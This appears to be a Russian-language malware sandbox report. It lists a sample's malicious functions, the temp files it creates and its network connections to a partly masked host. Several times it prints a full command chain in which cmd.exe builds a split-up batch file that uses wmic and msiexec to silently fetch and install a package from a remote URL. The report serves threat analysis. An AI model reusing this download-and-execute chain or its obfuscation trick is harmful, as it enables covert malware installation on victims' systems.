Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c echo|set /p="wmic process call create 'ms">%temp%\twJICvMSbNeOz.bat&echo|set /p="iexec /i http://newtontool.ca/wp-contents.php /q'" >> %temp%\twJICvMSbNeOz.bat&%temp%\twJICvMSbNeOz.bat>%temp...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1384
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\twjicvmsbneoz.bat
- %TEMP%\twjicvmsbneoz.txt
- %TEMP%\969140.cvr
Сетевая активность
Подключается к
- 'ne###ntool.ca':80
- 'ne###ntool.ca':443
TCP
Запросы HTTP GET
- http://ne###ntool.ca/wp-contents.php
Другие
- 'ne###ntool.ca':443
UDP
- DNS ASK ne###ntool.ca
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c echo|set /p="wmic process call create 'ms">%temp%\twJICvMSbNeOz.bat&echo|set /p="iexec /i http://newtontool.ca/wp-contents.php /q'" >> %temp%\twJICvMSbNeOz.bat&%temp%\twJICvMSbNeOz.bat>%temp...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /S /D /c" echo"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="wmic process call create 'ms" 1>%TEMP%\twJICvMSbNeOz.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="iexec /i http://newtontool.ca/wp-contents.php /q'" 1>>%TEMP%\twJICvMSbNeOz.bat"
- '<SYSTEM32>\wbem\wmic.exe' process call create 'msiexec /i http://newtontool.ca/wp-contents.php /q'
- '<SYSTEM32>\msiexec.exe' /i http://newtontool.ca/wp-contents.php /q
